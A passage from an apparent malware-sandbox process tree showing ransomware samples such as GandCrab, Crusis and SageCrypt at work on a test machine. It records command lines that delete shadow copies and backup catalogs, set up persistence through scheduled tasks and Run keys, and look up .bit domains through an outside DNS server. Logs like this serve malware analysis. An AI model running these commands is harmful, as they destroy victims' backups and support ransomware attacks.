                            • C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
                              "C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"
                              6⤵
                                PID:10468
                              • C:\Users\Admin\AppData\Local\Temp\y_installer.exe
                                C:\Users\Admin\AppData\Local\Temp\y_installer.exe --stat dwnldr/p=351634/cnt=0/dt=4/ct=4/rt=0 --dh 2344 --st 1730744207
                                6⤵
                                  PID:13536
                            • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Generic-3b73775e3999fa2a73354e2f9073ae52c61f2aa4ed348b0889f3c85653cf1145.exe
                              HEUR-Trojan-Ransom.Win32.Generic-3b73775e3999fa2a73354e2f9073ae52c61f2aa4ed348b0889f3c85653cf1145.exe
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:4160
                              • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Generic-3b73775e3999fa2a73354e2f9073ae52c61f2aa4ed348b0889f3c85653cf1145.exe
                                HEUR-Trojan-Ransom.Win32.Generic-3b73775e3999fa2a73354e2f9073ae52c61f2aa4ed348b0889f3c85653cf1145.exe
                                5⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:3188
                                • C:\Users\Admin\AppData\Roaming\Ogro\owomy.exe
                                  "C:\Users\Admin\AppData\Roaming\Ogro\owomy.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of WriteProcessMemory
                                  PID:2540
                                  • C:\Users\Admin\AppData\Roaming\Ogro\owomy.exe
                                    "C:\Users\Admin\AppData\Roaming\Ogro\owomy.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of WriteProcessMemory
                                    PID:3452
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_de89bd84.bat"
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5072
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    7⤵
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4496
                            • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Stop.vho-8a4214d3c69df6a10e057fe1071e6bbb2ebd463bf3e73b9c66c3cbf3f31839b2.exe
                              HEUR-Trojan-Ransom.Win32.Stop.vho-8a4214d3c69df6a10e057fe1071e6bbb2ebd463bf3e73b9c66c3cbf3f31839b2.exe
                              4⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:1356
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 868
                                5⤵
                                • Program crash
                                PID:4212
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 876
                                5⤵
                                • Program crash
                                PID:3872
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 876
                                5⤵
                                • Program crash
                                PID:8840
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 860
                                5⤵
                                • Program crash
                                PID:9888
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1100
                                5⤵
                                • Program crash
                                PID:14080
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1144
                                5⤵
                                • Program crash
                                PID:7992
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1576
                                5⤵
                                • Program crash
                                PID:13608
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1648
                                5⤵
                                • Program crash
                                PID:6572
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1584
                                5⤵
                                • Program crash
                                PID:13104
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1684
                                5⤵
                                • Program crash
                                PID:13904
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1672
                                5⤵
                                • Program crash
                                PID:12380
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1712
                                5⤵
                                • Program crash
                                PID:5340
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1652
                                5⤵
                                • Program crash
                                PID:12448
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Users\Admin\AppData\Local\4a825eaf-21ee-40bd-8c9e-d7f0cccf5381" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                5⤵
                                • Modifies file permissions
                                PID:14472
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1984
                                5⤵
                                • Program crash
                                PID:10716
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 2040
                                5⤵
                                • Program crash
                                PID:13072
                              • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Stop.vho-8a4214d3c69df6a10e057fe1071e6bbb2ebd463bf3e73b9c66c3cbf3f31839b2.exe
                                "C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Stop.vho-8a4214d3c69df6a10e057fe1071e6bbb2ebd463bf3e73b9c66c3cbf3f31839b2.exe" --Admin IsNotAutoStart IsNotTask
                                5⤵
                                  PID:4728
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 792
                                    6⤵
                                    • Program crash
                                    PID:10180
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 800
                                    6⤵
                                    • Program crash
                                    PID:12408
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 800
                                    6⤵
                                    • Program crash
                                    PID:5560
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 884
                                    6⤵
                                    • Program crash
                                    PID:6344
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1064
                                    6⤵
                                    • Program crash
                                    PID:13636
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1088
                                    6⤵
                                    • Program crash
                                    PID:8348
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1348
                                    6⤵
                                    • Program crash
                                    PID:7500
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1552
                                    6⤵
                                    • Program crash
                                    PID:1832
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1648
                                    6⤵
                                    • Program crash
                                    PID:6164
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1656
                                    6⤵
                                    • Program crash
                                    PID:10308
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1688
                                    6⤵
                                    • Program crash
                                    PID:12396
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1228
                                    6⤵
                                    • Program crash
                                    PID:8228
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1708
                                    6⤵
                                    • Program crash
                                    PID:7896
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1724
                                    6⤵
                                    • Program crash
                                    PID:1052
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1536
                                    6⤵
                                    • Program crash
                                    PID:11160
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1772
                                    6⤵
                                    • Program crash
                                    PID:3212
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 2072
                                  5⤵
                                  • Program crash
                                  PID:13460
                              • C:\Users\Admin\Desktop\00377\Trojan-Ransom.MSIL.Agent.fqlx-349508bdc31aa72e48eaf47543c0f007126df7e2691a22d2d37ac70e1cd00c62.exe
                                Trojan-Ransom.MSIL.Agent.fqlx-349508bdc31aa72e48eaf47543c0f007126df7e2691a22d2d37ac70e1cd00c62.exe
                                4⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • System Location Discovery: System Language Discovery
                                PID:3532
                                • C:\Program Files (x86)\Project2_v1.2\kotlock1.2.exe
                                  "C:\Program Files (x86)\Project2_v1.2\kotlock1.2.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:780
                              • C:\Users\Admin\Desktop\00377\Trojan-Ransom.MSIL.Blocker.bn-e806dd8fe344e38a00a76b52b28476b7e3e25147b5fc7eed01b8f0ab86bd7bf5.exe
                                Trojan-Ransom.MSIL.Blocker.bn-e806dd8fe344e38a00a76b52b28476b7e3e25147b5fc7eed01b8f0ab86bd7bf5.exe
                                4⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4716
                                • C:\Users\Admin\AppData\Roaming\openvpnserv.exe
                                  "C:\Users\Admin\AppData\Roaming\openvpnserv.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:13640
                              • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Blocker.mbrj-ec63c5041f96cac25d9ea2e078b9103afbf9fa760d1cf94107ad9cada121e3da.exe
                                Trojan-Ransom.Win32.Blocker.mbrj-ec63c5041f96cac25d9ea2e078b9103afbf9fa760d1cf94107ad9cada121e3da.exe
                                4⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:1672
                                • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Blocker.mbrj-ec63c5041f96cac25d9ea2e078b9103afbf9fa760d1cf94107ad9cada121e3da.exe
                                  "C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Blocker.mbrj-ec63c5041f96cac25d9ea2e078b9103afbf9fa760d1cf94107ad9cada121e3da.exe"
                                  5⤵
                                    PID:6636
                                    • C:\ProgramData\images.exe
                                      "C:\ProgramData\images.exe"
                                      6⤵
                                        PID:5856
                                        • C:\ProgramData\images.exe
                                          "C:\ProgramData\images.exe"
                                          7⤵
                                            PID:12720
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe"
                                              8⤵
                                                PID:4636
                                      • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Blocker.mdly-80b7fc97d015e313a0fad37f406f62e45a55a6ae574aae41d8095e42a90908dd.exe
                                        Trojan-Ransom.Win32.Blocker.mdly-80b7fc97d015e313a0fad37f406f62e45a55a6ae574aae41d8095e42a90908dd.exe
                                        4⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3104
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          5⤵
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:2192
                                      • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Crusis.drv-425e4f08a31dc3c68a1a3a2518322531a4b9043ce66a683184d4d0b6e0ae6913.exe
                                        Trojan-Ransom.Win32.Crusis.drv-425e4f08a31dc3c68a1a3a2518322531a4b9043ce66a683184d4d0b6e0ae6913.exe
                                        4⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        PID:4192
                                        • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Crusis.drv-425e4f08a31dc3c68a1a3a2518322531a4b9043ce66a683184d4d0b6e0ae6913.exe
                                          C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Crusis.drv-425e4f08a31dc3c68a1a3a2518322531a4b9043ce66a683184d4d0b6e0ae6913.exe
                                          5⤵
                                          • Drops startup file
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Drops desktop.ini file(s)
                                          • Drops file in System32 directory
                                          • Drops file in Program Files directory
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: RenamesItself
                                          PID:5664
                                          • C:\Windows\system32\cmd.exe
                                            "C:\Windows\system32\cmd.exe"
                                            6⤵
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:6924
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              7⤵
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetWindowsHookEx
                                              PID:6432
                                            • C:\Windows\system32\mode.com
                                              mode con cp select=1251
                                              7⤵
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              PID:6532
                                            • C:\Windows\system32\vssadmin.exe
                                              vssadmin delete shadows /all /quiet
                                              7⤵
                                              • Interacts with shadow copies
                                              PID:7820
                                          • C:\Windows\system32\cmd.exe
                                            "C:\Windows\system32\cmd.exe"
                                            6⤵
                                              PID:9564
                                              • C:\Windows\system32\mode.com
                                                mode con cp select=1251
                                                7⤵
                                                  PID:8836
                                                • C:\Windows\system32\vssadmin.exe
                                                  vssadmin delete shadows /all /quiet
                                                  7⤵
                                                  • Interacts with shadow copies
                                                  PID:5164
                                              • C:\Windows\System32\mshta.exe
                                                "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                6⤵
                                                  PID:12940
                                                • C:\Windows\System32\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                  6⤵
                                                    PID:13532
                                              • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Crusis.to-482e5b77bf6c0c2953e2e8a456a3a072a3f9d5cb35e822e493d062d2372a1fc0.exe
                                                Trojan-Ransom.Win32.Crusis.to-482e5b77bf6c0c2953e2e8a456a3a072a3f9d5cb35e822e493d062d2372a1fc0.exe
                                                4⤵
                                                • Drops startup file
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Drops desktop.ini file(s)
                                                • Drops file in System32 directory
                                                • Drops file in Program Files directory
                                                • System Location Discovery: System Language Discovery
                                                PID:1668
                                                • C:\Windows\system32\cmd.exe
                                                  "C:\Windows\system32\cmd.exe"
                                                  5⤵
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:964
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    6⤵
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:3340
                                                  • C:\Windows\system32\mode.com
                                                    mode con cp select=1251
                                                    6⤵
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:5304
                                                  • C:\Windows\system32\vssadmin.exe
                                                    vssadmin delete shadows /all /quiet
                                                    6⤵
                                                    • Interacts with shadow copies
                                                    PID:12560
                                                • C:\Windows\system32\cmd.exe
                                                  "C:\Windows\system32\cmd.exe"
                                                  5⤵
                                                    PID:12244
                                                    • C:\Windows\system32\mode.com
                                                      mode con cp select=1251
                                                      6⤵
                                                        PID:12764
                                                      • C:\Windows\system32\vssadmin.exe
                                                        vssadmin delete shadows /all /quiet
                                                        6⤵
                                                        • Interacts with shadow copies
                                                        PID:10140
                                                    • C:\Windows\System32\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                      5⤵
                                                        PID:5420
                                                      • C:\Windows\System32\mshta.exe
                                                        "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                        5⤵
                                                          PID:13260
                                                      • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Cryakl.aiv-e49778d20a2f9b1f8b00ddd24b6bcee81af381ed02cfe0a3c9ab3111cda5f573.exe
                                                        Trojan-Ransom.Win32.Cryakl.aiv-e49778d20a2f9b1f8b00ddd24b6bcee81af381ed02cfe0a3c9ab3111cda5f573.exe
                                                        4⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4904
                                                        • C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Cryakl.aiv-e49778d20a2f9b1f8b00ddd24b6bcee81af381ed02cfe0a3c9ab3111cda5f573.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Cryakl.aiv-e49778d20a2f9b1f8b00ddd24b6bcee81af381ed02cfe0a3c9ab3111cda5f573.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • System Location Discovery: System Language Discovery
                                                          PID:11236
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AHQND.bat" "
                                                            6⤵
                                                              PID:5356
                                                              • C:\Windows\SysWOW64\chcp.com
                                                                chcp 1251
                                                                7⤵
                                                                  PID:12112
                                                          • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Foreign.ogeg-d1d78a3b36dc832ee632f6dcf87b9817d0ea8b9c3e7f1e78e64293776ebff291.exe
                                                            Trojan-Ransom.Win32.Foreign.ogeg-d1d78a3b36dc832ee632f6dcf87b9817d0ea8b9c3e7f1e78e64293776ebff291.exe
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2216
                                                            • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Foreign.ogeg-d1d78a3b36dc832ee632f6dcf87b9817d0ea8b9c3e7f1e78e64293776ebff291.exe
                                                              C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Foreign.ogeg-d1d78a3b36dc832ee632f6dcf87b9817d0ea8b9c3e7f1e78e64293776ebff291.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5376
                                                          • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.GandCrypt.jcc-f60d7ae9ad4ed077cebee430314ee63c04cbfd97aa2277db07ca144de5905ef5.exe
                                                            Trojan-Ransom.Win32.GandCrypt.jcc-f60d7ae9ad4ed077cebee430314ee63c04cbfd97aa2277db07ca144de5905ef5.exe
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Checks processor information in registry
                                                            PID:4128
                                                          • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.GandCrypt.jes-9c62bea07a80cb3d29ccaf50f5d4ed4437d3e865f039a00b2f3b56a053854d50.exe
                                                            Trojan-Ransom.Win32.GandCrypt.jes-9c62bea07a80cb3d29ccaf50f5d4ed4437d3e865f039a00b2f3b56a053854d50.exe
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Enumerates connected drives
                                                            • System Location Discovery: System Language Discovery
                                                            • Checks processor information in registry
                                                            PID:5016
                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                              nslookup nomoreransom.bit dns1.soprodns.ru
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:9480
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                6⤵
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:8352
                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                              nslookup emsisoft.bit dns1.soprodns.ru
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:9148
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                6⤵
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:11684
                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                              nslookup gandcrab.bit dns1.soprodns.ru
                                                              5⤵
                                                                PID:6276
                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                nslookup nomoreransom.bit dns1.soprodns.ru
                                                                5⤵
                                                                  PID:13840
                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                  nslookup emsisoft.bit dns1.soprodns.ru
                                                                  5⤵
                                                                    PID:14488
                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                    nslookup gandcrab.bit dns1.soprodns.ru
                                                                    5⤵
                                                                      PID:9708
                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                      nslookup nomoreransom.bit dns1.soprodns.ru
                                                                      5⤵
                                                                        PID:10568
                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                        nslookup emsisoft.bit dns1.soprodns.ru
                                                                        5⤵
                                                                          PID:9340
                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                          nslookup gandcrab.bit dns1.soprodns.ru
                                                                          5⤵
                                                                            PID:7388
                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                            nslookup nomoreransom.bit dns1.soprodns.ru
                                                                            5⤵
                                                                              PID:5536
                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                              nslookup emsisoft.bit dns1.soprodns.ru
                                                                              5⤵
                                                                                PID:8884
                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                nslookup gandcrab.bit dns1.soprodns.ru
                                                                                5⤵
                                                                                  PID:11672
                                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                                  nslookup nomoreransom.bit dns1.soprodns.ru
                                                                                  5⤵
                                                                                    PID:12612
                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                    nslookup emsisoft.bit dns1.soprodns.ru
                                                                                    5⤵
                                                                                      PID:10848
                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                      nslookup gandcrab.bit dns1.soprodns.ru
                                                                                      5⤵
                                                                                        PID:11508
                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                        nslookup nomoreransom.bit dns1.soprodns.ru
                                                                                        5⤵
                                                                                          PID:13080
                                                                                      • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.GandCrypt.jhg-545662ab4664c7f53a07fe08acabc621549198bdc37c8837ba092e50469d714c.exe
                                                                                        Trojan-Ransom.Win32.GandCrypt.jhg-545662ab4664c7f53a07fe08acabc621549198bdc37c8837ba092e50469d714c.exe
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Checks processor information in registry
                                                                                        PID:8716
                                                                                      • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.PornoAsset.dfnx-76909e4a45d8afec186d8eeb2cb041695e7d5a7a9b436dd5520055bdfef0654f.exe
                                                                                        Trojan-Ransom.Win32.PornoAsset.dfnx-76909e4a45d8afec186d8eeb2cb041695e7d5a7a9b436dd5520055bdfef0654f.exe
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:8676
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-2ATTU.tmp\Trojan-Ransom.Win32.PornoAsset.dfnx-76909e4a45d8afec186d8eeb2cb041695e7d5a7a9b436dd5520055bdfef0654f.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-2ATTU.tmp\Trojan-Ransom.Win32.PornoAsset.dfnx-76909e4a45d8afec186d8eeb2cb041695e7d5a7a9b436dd5520055bdfef0654f.tmp" /SL5="$70250,2445961,51712,C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.PornoAsset.dfnx-76909e4a45d8afec186d8eeb2cb041695e7d5a7a9b436dd5520055bdfef0654f.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Adds Run key to start application
                                                                                          • Drops file in System32 directory
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:11788
                                                                                          • C:\Windows\SysWOW64\CulServerView.exe
                                                                                            "C:\Windows\system32\CulServerView.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5476
                                                                                      • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.SageCrypt.eqv-7118ab779b8ec5722024db9e71c82e10ad430f31765826a98ec5449e962a5415.exe
                                                                                        Trojan-Ransom.Win32.SageCrypt.eqv-7118ab779b8ec5722024db9e71c82e10ad430f31765826a98ec5449e962a5415.exe
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:10984
                                                                                        • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.SageCrypt.eqv-7118ab779b8ec5722024db9e71c82e10ad430f31765826a98ec5449e962a5415.exe
                                                                                          "C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.SageCrypt.eqv-7118ab779b8ec5722024db9e71c82e10ad430f31765826a98ec5449e962a5415.exe" g
                                                                                          5⤵
                                                                                            PID:180
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /CREATE /TN "r75nBTiJ" /TR "C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.SageCrypt.eqv-7118ab779b8ec5722024db9e71c82e10ad430f31765826a98ec5449e962a5415.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                            5⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:3056
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                            5⤵
                                                                                              PID:5512
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                6⤵
                                                                                                  PID:10824
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                  6⤵
                                                                                                    PID:1704
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                    6⤵
                                                                                                      PID:11884
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        wmic shadowcopy delete
                                                                                                        7⤵
                                                                                                          PID:7608
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                        6⤵
                                                                                                          PID:10728
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                          6⤵
                                                                                                            PID:13832
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                            6⤵
                                                                                                              PID:13268
                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                wmic shadowcopy delete
                                                                                                                7⤵
                                                                                                                  PID:15240
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                6⤵
                                                                                                                  PID:12996
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                                  6⤵
                                                                                                                    PID:3336
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
